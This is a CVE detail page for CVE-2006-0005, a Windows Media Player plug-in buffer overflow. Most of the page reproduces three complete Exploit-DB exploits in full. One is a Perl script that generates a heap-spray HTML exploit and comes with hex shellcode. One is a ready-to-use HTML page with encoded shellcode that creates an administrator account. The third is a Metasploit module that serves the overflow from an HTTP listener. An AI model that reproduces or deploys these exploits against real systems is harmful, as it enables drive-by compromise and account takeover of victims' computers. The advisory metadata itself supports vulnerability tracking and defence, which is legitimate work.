CVE-2006-0005 : Detail

CVE-2006-0005

Overflow
71.77%V4
Network
2006-02-14
18h00 +00:00
2018-10-12
17h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in the plug-in for Microsoft Windows Media Player (WMP) 9 and 10, when used in browsers other than Internet Explorer and set as the default application to handle media files, allows remote attackers to execute arbitrary code via HTML with an EMBED element containing a long src attribute.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 1520

Publication date : 2006-02-21 23h00 +00:00
Author : Matthew Murphy
EDB Verified : Yes

#!/usr/bin/perl # # wmp-profiteer.pl # Exploiting 'Non-Critical' Media Player Vulnerabilities for Fun and Profit # By Matthew Murphy (mattmurphy@kc.rr.com) # # It's come to my attention that the HTML versions of the exploit posted on # several sites have become mangled. Notables include SecuriTeam and FrSIRT. # Neither one, though, can beat SecurityFocus, whose links to the exploits # for this issue are both 404s. # # I haven't updated the underlying exploit methodology -- it's still a shameless # rip of Skylined's heap spray technique, but now the shellcode can be # customized! # # The usage of this tool is as follows: # # wmp-profiteer.pl [shellcode] # # The shellcode that comes with this has the same payload as the original. # If it's successful against you, you'll have an administrator account named # 'wmp0wn3d' with a password of 'password'. This, of course, assumes that # you're running the vulnerable application as an administrator. There's a # lesson in that: run as a Limited User or at least tie down your browsers # with Software Restriction. # # This will drop 'wmp-exploit.html' in the current directory. When the HTML # document is opened locally or viewed remotely by a vulnerable web browser # (Firefox on Windows), the exploit code will run and gain control of the # browser. # # The standard disclaimer from the original exploit still applies, with some # changes: # # This exploit code is intended only as a demonstration tool for # educational or testing purposes. It is not intended to be used for any # unauthorized or illicit purpose. Any testing done with this tool OR ANY # PRODUCT OR ALTERATION THEREOF must be limited to systems that you own or # are explicitly authorized to test. # # By utilizing or possessing this code, you assume any and all # responsibility for damage that results. The author will not be held # responsible, under any circumstances, for damage that arises from your # possession or use of this code. $part1 = "<!DOCTYPE HTML PUBLIC \"-//W3C DTD HTML 4.01 Transitional//EN\"> <HTML> <HEAD> <TITLE>WMP EMBED Exploit by Matthew Murphy</TITLE> <SCRIPT> var spray = unescape(\"%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141\"); do { spray += spray; } while (spray.length < 0x1000000); spray += unescape(\""; $part2 = "\"); </SCRIPT> </HEAD> <BODY BGCOLOR=\"#FFFFFF\" TEXT=\"#000000\"> <EMBED SRC=\""; $part3 = "\"></EMBED> </BODY> </HTML>"; if (@ARGV != 1) { print STDERR "Usage: $0 [shellcode file]"; } open(EXPLOIT, ">./wmp-exploit.html") or die "Cannot open 'wmp-exploit.html for writing."; print EXPLOIT $part1; open(SHELLCODE, $ARGV[0]) or die "Shellcode file not found."; while (!eof(SHELLCODE)) { $ch1 = getc(SHELLCODE); if (eof(SHELLCODE)) { print EXPLOIT "%u00"; print EXPLOIT sprintf("%%u00%.2x", ord($ch1)); } else { $ch2 = getc(SHELLCODE); print EXPLOIT sprintf("%%u%.2x%.2x", ord($ch2), ord($ch1)); } } close(SHELLCODE); print EXPLOIT $part2; print EXPLOIT "-"x2038; print EXPLOIT "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLL"; print EXPLOIT "AAA\x05"; print EXPLOIT "NNNNOOOO"; print EXPLOIT "AAA\x05"; print EXPLOIT "QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv"; print EXPLOIT $part3; close(EXPLOIT); ----------------------------------------------- shellcode.hex ----------------------------------------- :020000040000FA :100000002BC983E9C9D9EED97424F45B8173132118 :10001000C414F183EBFCE2F4DD2C50F121C49FB455 :100020001D4F68F459C5FB7A6EDC9FAE01C5FFB861 :10003000AAF09FF0CFF5D4688D40D4852605DEFC6C :100040002006FF051A9030F554219FAE05C5FF9795 :10005000AAC85F7A7ED8151AAAD89FF0CA4D48D58B :1000600025072531454F54C1A4046CFDAA84187A94 :1000700051D8B97A49CCFFF8AA44A4F121C49F9978 :100080001D9B250741929D09A2046FA149349EF54D :100090007EAC8C0FABCA430EC6A779950FA16C94AA :1000A00001EB77D14FA160D154B7718301B379814E :1000B00011B37AC245E4649052B7639E53A034DE14 :1000C000608050D107E2349F44B0349D4EA7759DA7 :1000D00046B67B8451E455954CAD7A9852B0669003 :1000E00055AB668201B3798111B37AC245E43BB066 :0400F000658014F122 :00000001FF # milw0rm.com [2006-02-22]
Exploit Database EDB-ID : 1505

Publication date : 2006-02-16 23h00 +00:00
Author : Matthew Murphy
EDB Verified : Yes

<HTML> <HEAD> <TITLE>WMP Plugin EMBED Exploit</TITLE> <SCRIPT> // Windows Media Player Plug-In EMBED Overflow Universal Exploit (MS06-006) // By Matthew Murphy (mattmurphy@kc.rr.com) // // DISCLAIMER: // // This exploit code is intended only as a demonstration tool for // educational or testing purposes. It is not intended to be used for any // unauthorized or illicit purpose. Any testing done with this tool must // be limited to systems that you own or are explicitly authorized to // test. // // By utilizing or possessing this code, you assume any and all // responsibility for damage that results. The author will not be held // responsible, under any circumstances, for damage that arises from your // possession or use of this code. // // Tested: // Firefox 1.5.0.1 // Windows Media Player 10 // Windows XP SP2 (US) // // The Windows Media Player plug-in for non-Microsoft browsers (Firefox, // Opera, etc.) suffers from an exploitable overflow in its handling of // EMBED tags. Specifically, a very long SRC property on such a tag can // lead to an overflow that will corrupt a structured exception handling // frame. // // The SEH frame is the vector of control that I exploit. Fortunately, // DEP is turned off for non-Microsoft code, so there's no issue there. // That's really a shame, because such a move would've made an already // difficult exploit much harder. // // One of the reasons the exploit is tough is because the overrun buffer // (the SRC attribute) is seriously mangled before it is handled by the // plug-in. In particular, any character with the sign bit set (> 0x7F) // is replaced. // // We could do as the creative wizards like HD Moore suggest and use an // alphanumeric payload with some cute SEH tricks. Let me rephrase: // YOU could do as the creative wizards suggest. Meanwhile, I'm perfectly // content to throw my code in another buffer and get around all the silly // alpha-numeric sanitation. Sure beats devoting hours to beating it // with fancy shellcode, all for a PoC I may never release. // // Instead, I shamelessly ripped a page from Skylined's book and borrowed // (and cleaned up) the heap spraying technique. My heap-spray is a lot // less precise, because the memory layout is a lot more variable. In // my experience, it took a _HUGE_ block allocation to get the heap I // wanted to jump to into a reliably-placed location. Hence the atrocity // of the 16MB of noops below. // // Aside from the character restrictions, this is a standard stack-based // overflow. I simply smash the SEH frame with a pointer to my HUGE heap // block, which consists of a bunch of 0x41 characters. An INC ECX is a // functional noop -- so the box takes the slide down the heap into the // shellcode. The shellcode is a standard Win32 "add administrator" // payload from Metasploit. // // This exploit is a lot of ripping, cleaning and re-implementation, but // that just goes to show how easy it is to write. So... how about that // 'Important' rating? A bit perplexing to rate a "click-and-own" as an // Important... or is it just because nobody would *DARE* run one of those // "Non-Microsoft" browsers on Windows? :-) // Spray the heap var spray = unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"); do { spray += spray; } while (spray.length < 0x1000000); // If this is successful, you can login as a local admin: // // User: wmp0wn3d // Pass: password spray += unescape( "%uc933%ue983%ud9c9%ud9ee%u2474%u5bf4%u7381%u9713"+ "%u798c%u839b%ufceb%uf4e2%u646b%u9b3d%u8c97%udef2"+ "%u07ab%u9e05%u8def%u1096%u94d8%uc4f2%u8db7%ud292"+ "%ub81c%u9af2%ubd79%u02b9%u083b%uefb9%u4d90%u96b3"+ "%u4e96%u6f92%ud8ac%u9f5d%u69e2%uc4f2%u8db3%ufd92"+ "%u801c%u1032%u90c8%u7078%u901c%u9af2%u057c%ubf25"+ "%u4f93%u5b48%u07f3%uab39%u4c12%u9701%ucc1c%u1075"+ "%u90e7%u10d4%u84ff%u9292%u0c1c%u9bc9%u8c97%uf3f2"+ "%ud3ab%u6d48%udaf7%u63f0%u4c14%ucb02%u7cff%u9ff3"+ "%ue4c8%u65e1%u821d%u642e%uef70%uff14%ue9b9%ufe01"+ "%ua3b7%ubb1a%ue9f9%ubb0d%uffe2%ue91c%ufbb7%ueb14"+ "%ufba7%ua817%uacf3%ufa09%uffe4%uf40e%ue8e5%ub459"+ "%uc8d6%ubb3d%uaab1%uf559%uf8f2%uf759%ueff8%uf718"+ "%ufef0%uee16%uace7%uff38%ue5fa%uf217%uf8e4%ufa0b"+ "%ue3e3%ue80b%ufbb7%ueb14%ufba7%ua817%uacf3%uda56"+ "%uc8d3%u9b79" ); </SCRIPT> </HEAD> <BODY> <EMBED SRC="----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv"></EMBED> </BODY> </HTML> # milw0rm.com [2006-02-17]
Exploit Database EDB-ID : 1504

Publication date : 2006-02-16 23h00 +00:00
Author : H D Moore
EDB Verified : Yes

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::wmp_plugin_ms06_006; use strict; use base "Msf::Exploit"; use Pex::Text; use IO::Socket::INET; use IPC::Open3; my $advanced = { 'Gzip' => [1, 'Enable gzip content encoding'], 'Chunked' => [1, 'Enable chunked transfer encoding'], }; my $info = { 'Name' => 'Windows Media Player Plugin MS06-006 Overflow', 'Version' => '$Revision: 1.1 $', 'Authors' => [ 'H D Moore <hdm [at] metasploit.com', ], 'Description' => Pex::Text::Freeform(qq{ This module exploits a vulnerability in the Windows Media Player plugin for non-Microsoft web browsers. This module has been tested with Windows Media Player 9 on Windows 2000 SP4, Windows XP SP2, and Windows 2003 SP0 (Firefox 1.5 and Opera 8.5). }), 'Arch' => [ 'x86' ], 'OS' => [ 'win32', 'winxp', 'win2003' ], 'Priv' => 0, 'AutoOpts' => { 'EXITFUNC' => 'process', 'GETPCTYPE' => 'ecx' }, 'UserOpts' => { 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], 'REALHOST' => [ 0, 'HOST', 'External address to use for redirects (NAT)' ], }, 'Payload' => { # give some stack space, align esp 'Space' => 1024, 'BadChars' => "\x00\x22".join('', map { $_=chr($_) } (0x80 .. 0xff)), 'MinNops' => 0, 'MaxNops' => 0, }, 'Refs' => [ ['CVE', '2006-0005'], ['OSVDB', '23132'], ['MSB', 'MS06-006'], ['BID', '15130'], ], 'DefaultTarget' => 0, 'Targets' => [ [ 'Automatic - WMP 9.0', 0x07694b1e ] ], 'Keys' => [ 'wmp' ], 'DisclosureDate' => 'Feb 14 2006', }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $server = IO::Socket::INET->new( LocalHost => $self->GetVar('HTTPHOST'), LocalPort => $self->GetVar('HTTPPORT'), ReuseAddr => 1, Listen => 1, Proto => 'tcp' ); my $client; # Did the listener create fail? if (not defined($server)) { $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); return; } my $httphost = $self->GetVar('HTTPHOST'); $httphost = Pex::Utils::SourceIP('1.2.3.4') if $httphost eq '0.0.0.0'; $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/"); while (defined($client = $server->accept())) { $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); } return; } sub HandleHttpClient { my $self = shift; my $fd = shift; # Set the remote host information my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); # Read the HTTP command my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3); my $agent; # Read in the HTTP headers while ((my $line = $fd->RecvLine(10))) { $line =~ s/^\s+|\s+$//g; my ($var, $val) = split(/\:/, $line, 2); # Break out if we reach the end of the headers last if (not defined($var) or not defined($val)); $agent = $val if $var =~ /User-Agent/i; } my $addr; ## # XXX Does not detect Windows SP levels or WMP version :-( ## # Windows NT and Windows 2000 systems if ($agent =~ /Windows NT [45]\.0/) { $self->PrintLine("[*] Targetting WMP v9 on NT/2000..."); $addr = 0x07694b1e; # wmp.dll v9.00.00.2980 } # Windows XP SP2 if ($agent =~ /Windows NT 5\.1/) { $self->PrintLine("[*] Targetting WMP v9 on XP SP2..."); $addr = 0x4b5d5c74; # wmp.dll v9.00.00.3250 } # Windows 2003 SP0 if ($agent =~ /Windows NT 5\.2/) { $self->PrintLine("[*] Targetting WMP v9 on 2003 SP0..."); $addr = 0x585a6052; # wmp.dll v9.00.00.2991 } my $target = $self->Targets->[$self->GetVar('TARGET')]; my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $pattern = "C" x 4000; $addr = $target->[1] if ! $addr; # We can't use SEH getpc from inside a SEH handler on XP SP2 >:( # So we do it like a drunk ninja. my $getpc = "\x58\x58\x58". # pop eax, pop eax, pop eax "\x05\x18\x29\x29\x29". # add eax,0x29292917 "\x2d\x01\x29\x29\x29". # sub eax,0x29292901 "\x50\x59"; # push eax, pop ecx substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr] substr($pattern, 2086, 4, pack('V', $addr)); substr($pattern, 2090, length($getpc), $getpc); substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode); my $content = "<html><body><embed type=\"application/x-mplayer2\" src=\"$pattern.wmv\"></body></html>"; $self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload..."); $fd->Send($self->BuildResponse($content)); # Prevents IE from throwing an error in some cases select(undef, undef, undef, 0.1); $fd->Close(); } sub RandomHeaders { my $self = shift; my $head = ''; while (length($head) < 3072) { $head .= "X-" . Pex::Text::AlphaNumText(int(rand(30) + 5)) . ': ' . Pex::Text::AlphaNumText(int(rand(256) + 5)) ."\r\n"; } return $head; } sub BuildResponse { my ($self, $content) = @_; my $response = "HTTP/1.1 200 OK\r\n" . $self->RandomHeaders() . "Content-Type: text/html\r\n"; if ($self->GetVar('Gzip')) { $response .= "Content-Encoding: gzip\r\n"; $content = $self->Gzip($content); } if ($self->GetVar('Chunked')) { $response .= "Transfer-Encoding: chunked\r\n"; $content = $self->Chunk($content); } else { $response .= 'Content-Length: ' . length($content) . "\r\n" . "Connection: close\r\n"; } $response .= "\r\n" . $content; return $response; } sub Chunk { my ($self, $content) = @_; my $chunked; while (length($content)) { my $chunk = substr($content, 0, int(rand(10) + 1), ''); $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n"; } $chunked .= "0\r\n\r\n"; return $chunked; } sub Gzip { my $self = shift; my $data = shift; my $comp = int(rand(5))+5; my($wtr, $rdr, $err); my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); print $wtr $data; close ($wtr); local $/; return (<$rdr>); } 1; # milw0rm.com [2006-02-17]

Products Mentioned

Configuraton 0

Microsoft>>Windows-nt >> Version datacenter_server

    Microsoft>>Windows-nt >> Version datacenter_server

      Microsoft>>Windows-nt >> Version datacenter_server

        Microsoft>>Windows-nt >> Version datacenter_server

          Microsoft>>Windows-nt >> Version datacenter_server

            Microsoft>>Windows-nt >> Version xp

              Microsoft>>Windows-nt >> Version xp_tablet_pc

                Microsoft>>Windows-nt >> Version xp_tablet_pc

                  Microsoft>>Windows-nt >> Version xp_tablet_pc

                    Microsoft>>Windows_2000 >> Version *

                      Microsoft>>Windows_2000 >> Version *

                        Microsoft>>Windows_2000 >> Version *

                          Microsoft>>Windows_2000 >> Version *

                          Microsoft>>Windows_2000 >> Version *

                            Microsoft>>Windows_2000 >> Version -

                            Microsoft>>Windows_2000_advanced_server >> Version *

                              Microsoft>>Windows_2000_advanced_server >> Version sp1

                                Microsoft>>Windows_2000_advanced_server >> Version sp2

                                  Microsoft>>Windows_2000_advanced_server >> Version sp3

                                    Microsoft>>Windows_2000_advanced_server >> Version sp4

                                      Microsoft>>Windows_2003_server >> Version datacenter_edition

                                        Microsoft>>Windows_2003_server >> Version datacenter_edition_64-bit

                                          Microsoft>>Windows_2003_server >> Version enterprise_edition

                                            Microsoft>>Windows_2003_server >> Version enterprise_edition_64-bit

                                              Microsoft>>Windows_2003_server >> Version standard

                                                Microsoft>>Windows_2003_server >> Version standard_64-bit

                                                  Microsoft>>Windows_2003_server >> Version web_edition

                                                    Microsoft>>Windows_server_2000 >> Version none

                                                      Microsoft>>Windows_server_2000 >> Version sp1

                                                        Microsoft>>Windows_server_2000 >> Version sp2

                                                          Microsoft>>Windows_server_2000 >> Version sp3

                                                            Microsoft>>Windows_server_2003 >> Version datacenter_sp1

                                                              Microsoft>>Windows_server_2003 >> Version enterprise_sp1

                                                                Microsoft>>Windows_server_2003 >> Version standard_sp1

                                                                  Microsoft>>Windows_server_2003 >> Version web_edition_sp1

                                                                    Microsoft>>Windows_xp >> Version *

                                                                    Microsoft>>Windows_xp >> Version *

                                                                    Microsoft>>Windows_xp >> Version *

                                                                      Microsoft>>Windows_xp >> Version *

                                                                      Microsoft>>Windows_xp >> Version *

                                                                      Microsoft>>Windows_xp >> Version *

                                                                      Microsoft>>Windows_xp >> Version *

                                                                        Microsoft>>Windows_xp >> Version *

                                                                        Microsoft>>Windows_xp >> Version *

                                                                          Microsoft>>Windows_xp >> Version -

                                                                          References

                                                                          http://www.vupen.com/english/advisories/2006/0575
                                                                          Tags : vdb-entry, x_refsource_VUPEN
                                                                          http://www.securityfocus.com/bid/16644
                                                                          Tags : vdb-entry, x_refsource_BID
                                                                          http://securitytracker.com/id?1015628
                                                                          Tags : vdb-entry, x_refsource_SECTRACK
                                                                          http://www.kb.cert.org/vuls/id/692060
                                                                          Tags : third-party-advisory, x_refsource_CERT-VN
                                                                          http://www.idefense.com/intelligence/vulnerabilities/display.php?id=393
                                                                          Tags : third-party-advisory, x_refsource_IDEFENSE
                                                                          http://www.us-cert.gov/cas/techalerts/TA06-045A.html
                                                                          Tags : third-party-advisory, x_refsource_CERT
                                                                          http://secunia.com/advisories/18852
                                                                          Tags : third-party-advisory, x_refsource_SECUNIA